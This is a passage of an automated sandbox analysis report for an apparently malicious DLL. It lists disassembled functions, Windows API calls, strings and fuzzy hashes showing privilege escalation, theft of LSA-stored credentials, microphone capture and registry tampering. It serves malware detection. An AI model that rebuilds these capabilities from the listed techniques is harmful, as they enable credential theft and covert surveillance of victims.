                                                          • #1979.MFC42(00000000,?,0000000C,?,?,?,?,?,?,00000000), ref: 100082C2
                                                          • #800.MFC42 ref: 100082D0
                                                          • #800.MFC42 ref: 100082DE
                                                          • #665.MFC42 ref: 100082EF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #4204#665#800$#1979#2764#2915#354#5186#537#540#5442#5572#6874Message
                                                          • String ID: $warning
                                                          • API String ID: 2155908909-2294955047
                                                          • Opcode ID: 6067239a1790e2aaed7541fadd4d3c9716379e727bc193a2b9c93e17d5900de7
                                                          • Instruction ID: 9dc4441f8a4d83bc09c7214041b265d206f9ed4755861ec79b83bd27d9149c0a
                                                          • Opcode Fuzzy Hash: 6067239a1790e2aaed7541fadd4d3c9716379e727bc193a2b9c93e17d5900de7
                                                          • Instruction Fuzzy Hash: 3251E0751087459BD348DF64D991B9BB7E1FF94710F800A2DF99693285DB30AE08CB92
                                                          Function 1001E440 Relevance: 33.4, APIs: 5, Strings: 14, Instructions: 143filetimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000,1011EF78,00000000,0000005C), ref: 1001E484
                                                          • GetLocalTime.KERNEL32(?), ref: 1001E4CE
                                                          • sprintf.MSVCRT ref: 1001E599
                                                          • WriteFile.KERNEL32 ref: 1001E5EE
                                                          • CloseHandle.KERNEL32(00000000), ref: 1001E5F5
                                                            • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCrkat,?,00000000,0000002E,00000001), ref: 10014D10
                                                            • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D19
                                                            • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA), ref: 10014D27
                                                            • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D2A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressFileLibraryLoadProc$CloseCreateHandleLocalTimeWritesprintf
                                                          • String ID: $-$4$:$C:\ProgramData\Microsoft Drive\Mark.sys$M$T$TGByte\Setup$a$e$i$k$m$r
                                                          • API String ID: 694383593-1605913938
                                                          • Opcode ID: 4c6f48adef6daa44b2b0ac35a89abe2d34b5999bce17d81d3022533f6912276b
                                                          • Instruction ID: ffd3003c005704ab7e67b100a79d7c0ca88369faaa740befe4b72d95f5daddc9
                                                          • Opcode Fuzzy Hash: 4c6f48adef6daa44b2b0ac35a89abe2d34b5999bce17d81d3022533f6912276b
                                                          • Instruction Fuzzy Hash: BB516F7110D3C09EE311CB28C844B9BBFD5ABEA308F484A5DF5D967292C6B59608CB67
                                                          Function 10009F00 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 139COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 10007940: #541.MFC42(?,?,?,10097D2B,000000FF), ref: 10007960
                                                            • Part of subcall function 10007940: #540.MFC42(?,?,?,10097D2B,000000FF), ref: 10007970
                                                          • #540.MFC42(?,?,00000000,00000065), ref: 10009F4E
                                                          • #540.MFC42 ref: 10009F5F
                                                          • #540.MFC42 ref: 10009F70
                                                          • #2614.MFC42 ref: 10009F81
                                                          • #860.MFC42(*.*), ref: 10009F8F
                                                          • #3811.MFC42(?,*.*), ref: 10009FB5
                                                          • #3811.MFC42(?,?,*.*), ref: 10009FC5
                                                          • #3811.MFC42(?,?,?,*.*), ref: 10009FD5
                                                          • #3811.MFC42(?,?,?,?,*.*), ref: 10009FE5
                                                          • #3811.MFC42(?,?,?,?,?,*.*), ref: 10009FF5
                                                          • #3811.MFC42(?,?,?,?,?,?,*.*), ref: 1000A005
                                                          • #860.MFC42(?,?,?,?,?,?,?,*.*), ref: 1000A033
                                                          • #2818.MFC42(?,*%s*,?,?,?,?,?,?,?,?,*.*), ref: 1000A04A
                                                          • #860.MFC42(?,?,00000000,00000065), ref: 1000A097
                                                          • #800.MFC42 ref: 1000A0D2
                                                          • #800.MFC42 ref: 1000A0E3
                                                          • #800.MFC42 ref: 1000A0F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #3811$#540$#800#860$#2614#2818#541
                                                          • String ID: *%s*$*.*
                                                          • API String ID: 185796673-1558234275
                                                          • Opcode ID: 6abb6b1f1cb9d99256978181ee2c38739354c8b016ba86206848d68570f9c942
                                                          • Instruction ID: ee2751bb99efb5b8e8624e7515bc667b61434bbdc0d3475f74e87a486019deaf
                                                          • Opcode Fuzzy Hash: 6abb6b1f1cb9d99256978181ee2c38739354c8b016ba86206848d68570f9c942
                                                          • Instruction Fuzzy Hash: 9B5146754083858FC325CFA4C591AABFBE5FFD9700F840A2DB59983292DB74A508CB63
                                                          Function 1002C6A0 Relevance: 33.3, APIs: 11, Strings: 8, Instructions: 94libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32 ref: 1002C6B7
                                                          • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1002C6C7
                                                          • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 1002C6D1
                                                          • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 1002C6DD
                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 1002C6E8
                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 1002C6F4
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 1002C750
                                                          • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 1002C758
                                                          • CloseHandle.KERNEL32(?), ref: 1002C76A
                                                          • FreeLibrary.KERNEL32(00000000), ref: 1002C77B
                                                          • FreeLibrary.KERNEL32(?), ref: 1002C786
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryProc$Load$Free$CloseHandle
                                                          • String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$kernel32.dll
                                                          • API String ID: 2887716753-1648388921
                                                          • Opcode ID: a9b1a1682a1b70ae1ef51fcbf924e7be34b8c50650f9f94d2b2d5d74c0dc6493
                                                          • Instruction ID: 33c0dc777f036f73bb5b44afb239a268085fd6c5c3ab1e2ae988e7c16613607e
                                                          • Opcode Fuzzy Hash: a9b1a1682a1b70ae1ef51fcbf924e7be34b8c50650f9f94d2b2d5d74c0dc6493
                                                          • Instruction Fuzzy Hash: 3321A2716083046BD300EB75DC84FAFBBE8EFC8654F444A1DF544A3140DB78DA448B62
                                                          Function 10001310 Relevance: 33.3, APIs: 4, Strings: 15, Instructions: 85libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,SetEvent), ref: 10001329
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001332
                                                          • LoadLibraryA.KERNEL32 ref: 100013A4
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100013A7
                                                            • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(KERNEL32.dll,ResumeThread,00000000,?,00000000,771AF550), ref: 100015B9
                                                            • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 100015C2
                                                            • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(KERNEL32.dll,CreateThread,?,00000000,771AF550), ref: 100015D2
                                                            • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 100015D5
                                                            • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInOpen,?,00000000,771AF550), ref: 100015E5
                                                            • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 100015E8
                                                            • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInGetNumDevs,?,00000000,771AF550), ref: 100015F8
                                                            • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 100015FB
                                                            • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInPrepareHeader,?,00000000,771AF550), ref: 10001609
                                                            • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 1000160C
                                                            • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInAddBuffer,?,00000000,771AF550), ref: 1000161C
                                                            • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 1000161F
                                                            • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInStart,?,00000000,771AF550), ref: 1000162F
                                                            • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 10001632
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: F$KERNEL32.dll$O$S$SetEvent$W$a$b$c$g$j$l$n$o$r
                                                          • API String ID: 2574300362-1789360232
                                                          • Opcode ID: 8681ca1b1b33f73bda7f61c2a29eb6732c7a1b4a0c27a5eda15d591767e8de8a
                                                          • Instruction ID: 6d0500b828a3b4bacedf277e9e204f21e6ad90e68e93e0fee001a8a00f1ea147
                                                          • Opcode Fuzzy Hash: 8681ca1b1b33f73bda7f61c2a29eb6732c7a1b4a0c27a5eda15d591767e8de8a
                                                          • Instruction Fuzzy Hash: 7531C26110C3C08ED301DA6D9840B9BFFD59FA6658F090A9EE5C857343C6AAD61CC7BB
                                                          Function 10007230 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 211stringmemoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000,00000001,00000001), ref: 1000724A
                                                          • LocalAlloc.KERNEL32(00000040,00000400), ref: 100072B9
                                                          • GetFileAttributesA.KERNEL32(?), ref: 100072C9
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 100072F2
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 10007301
                                                          • malloc.MSVCRT ref: 1000730E
                                                          • ReadFile.KERNEL32(?,00000000,?,0000023D,00000000), ref: 10007335
                                                          • CloseHandle.KERNEL32(?), ref: 10007342
                                                          • free.MSVCRT ref: 10007378
                                                          • lstrlenA.KERNEL32(?), ref: 100073F9
                                                          • lstrlenA.KERNEL32(?), ref: 10007418
                                                          • lstrlenA.KERNEL32(?), ref: 10007427
                                                          • lstrlenA.KERNEL32(?), ref: 10007449
                                                          • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 10007457
                                                          • lstrlenA.KERNEL32(?), ref: 10007476
                                                          • lstrlenA.KERNEL32(?), ref: 10007493
                                                          • LocalReAlloc.KERNEL32(00000000,-00000002,00000042), ref: 100074A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$File$AllocLocal$AttributesCloseCreateFolderHandlePathReadSizeSpecialfreemalloc
                                                          • String ID: Version
                                                          • API String ID: 2101459175-1889659487
                                                          • Opcode ID: 6a0b98066b5d49aaa321f8aac068bd95de7a0d5d57adc8d2d75a6c02baa70be5
                                                          • Instruction ID: 769e996927bfc21683bf280013aeb7311bfd231a2bd5de20caf2ac03464e0c1e
                                                          • Opcode Fuzzy Hash: 6a0b98066b5d49aaa321f8aac068bd95de7a0d5d57adc8d2d75a6c02baa70be5
                                                          • Instruction Fuzzy Hash: 2E61C8756002045BE728DB78CC99BEB3795FB88310F54472DFE1ADB2D5DB78AA04C660
                                                          Function 100110D0 Relevance: 31.7, APIs: 21, Instructions: 157COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #2614.MFC42(00000000,?), ref: 100110F5
                                                          • #2614.MFC42(00000000,?), ref: 100110FD
                                                          • #6143.MFC42(00000000,000000FF,00000000,?), ref: 10011110
                                                          • #2614.MFC42(00000000,000000FF,00000000,?), ref: 1001111C
                                                            • Part of subcall function 10012190: #825.MFC42(?,00000000,?,?,?,1001112D,00000000,000000FF,00000000,000000FF,00000000,?), ref: 100121D1
                                                          • #860.MFC42(?,00000000,000000FF,00000000,000000FF,00000000,?), ref: 10011137
                                                          • PathGetArgsA.SHLWAPI(00000000,?), ref: 10011172
                                                          • #860.MFC42(00000000), ref: 1001117C
                                                          • PathRemoveArgsA.SHLWAPI(00000000), ref: 10011186
                                                          • PathUnquoteSpacesA.SHLWAPI(00000000,?), ref: 10011191
                                                          • _splitpath.MSVCRT ref: 100111C5
                                                          • #860.MFC42(?,?,?,?,?), ref: 100111D6
                                                          • #860.MFC42(?,?,?,?,?,?), ref: 100111E8
                                                          • #6876.MFC42(0000002F,0000005C,?,?,?,?,?,?), ref: 100111F3
                                                          • #858.MFC42 ref: 10011237
                                                          • #800.MFC42 ref: 1001124A
                                                          • #941.MFC42(?), ref: 10011259
                                                          • #858.MFC42 ref: 1001127E
                                                          • #800.MFC42 ref: 1001128E
                                                          • #860.MFC42(?,0000002F,0000005C,?,?,?,?,?,?), ref: 100112A0
                                                          • #860.MFC42(?,?,0000002F,0000005C,?,?,?,?,?,?), ref: 100112BE
                                                          • #6874.MFC42(0000002E,?,?,0000002F,0000005C,?,?,?,?,?,?), ref: 100112C7
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #860$#2614Path$#800#858Args$#6143#6874#6876#825#941RemoveSpacesUnquote_splitpath
                                                          • String ID:
                                                          • API String ID: 2691293456-0
                                                          • Opcode ID: 3e2eda024314cc5e32bb76d915b38d128f259786ccef139dba7872ee867caee5
                                                          • Instruction ID: c1f90ecbaa6655960492b8b6f0b929a9783f598dd6715e5503ef59e830b1600e
                                                          • Opcode Fuzzy Hash: 3e2eda024314cc5e32bb76d915b38d128f259786ccef139dba7872ee867caee5
                                                          • Instruction Fuzzy Hash: 9451C3792043459BC728CF64D951FEEB7E9EF88710F40461CF55A872C1DB70A609CB96
                                                          Function 100058B0 Relevance: 31.6, APIs: 7, Strings: 11, Instructions: 105libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32 ref: 1000590A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005913
                                                          • LoadLibraryA.KERNEL32(?,LsaOpenPolicy), ref: 10005923
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005926
                                                          • LoadLibraryA.KERNEL32(?,LsaClose), ref: 10005934
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005937
                                                          • free.MSVCRT ref: 10005993
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$free
                                                          • String ID: .23$2$3$D$I$L$_RasDefaultCredentials#0$LsaClose$LsaOpenPolicy$LsaRetrievePrivateData$P$V
                                                          • API String ID: 1540231353-1695543321
                                                          • Opcode ID: 885de384c055e857efefd678615c9cae5315e7cc058022f3c828cce3297e37f7
                                                          • Instruction ID: b87623f99a44c4d79927182bb7b3290fde75b39c0de0aa94dcbdadddc74f4482
                                                          • Opcode Fuzzy Hash: 885de384c055e857efefd678615c9cae5315e7cc058022f3c828cce3297e37f7
                                                          • Instruction Fuzzy Hash: 1A3192B610C3859ED300DB68DC84AABBBD8EBD4254F44491EF988D7241E675DA0DCBA3
                                                          Function 10025950 Relevance: 31.6, APIs: 5, Strings: 13, Instructions: 99registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseDeleteFreeLocalOpenwsprintf
                                                          • String ID: D$N$U$a$a$i$m$m$o$o$r$t$u
                                                          • API String ID: 321629408-3882932831
                                                          • Opcode ID: f3ef1aa64334a6f8a8983bb0ce524996e391ea5494bb12541602a1a6a0b68d46
                                                          • Instruction ID: 9e633f2ff59cbc2020f784f894622fe3b489b46e50fdb71083fa3736798a3e6b
                                                          • Opcode Fuzzy Hash: f3ef1aa64334a6f8a8983bb0ce524996e391ea5494bb12541602a1a6a0b68d46
                                                          • Instruction Fuzzy Hash: 4941256610E3C1DED302CB689484A8BBFD56BB6608F48499DF4C857342C6A9C61CC7BB
                                                          Function 10014CA0 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 181registrylibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCrkat,?,00000000,0000002E,00000001), ref: 10014D10
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10014D19
                                                          • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA), ref: 10014D27
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10014D2A
                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,0000004D,ExA,0000004D), ref: 10014DD4
                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,0000004D,?), ref: 10014DFE
                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 10014E2A
                                                          • RegDeleteValueA.ADVAPI32(?,?), ref: 10014E56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Value$AddressDeleteLibraryLoadProc
                                                          • String ID: A$ADVAPI32.dll$E$ExA$K$RegCrkat$RegOpenKeyExA$x$y
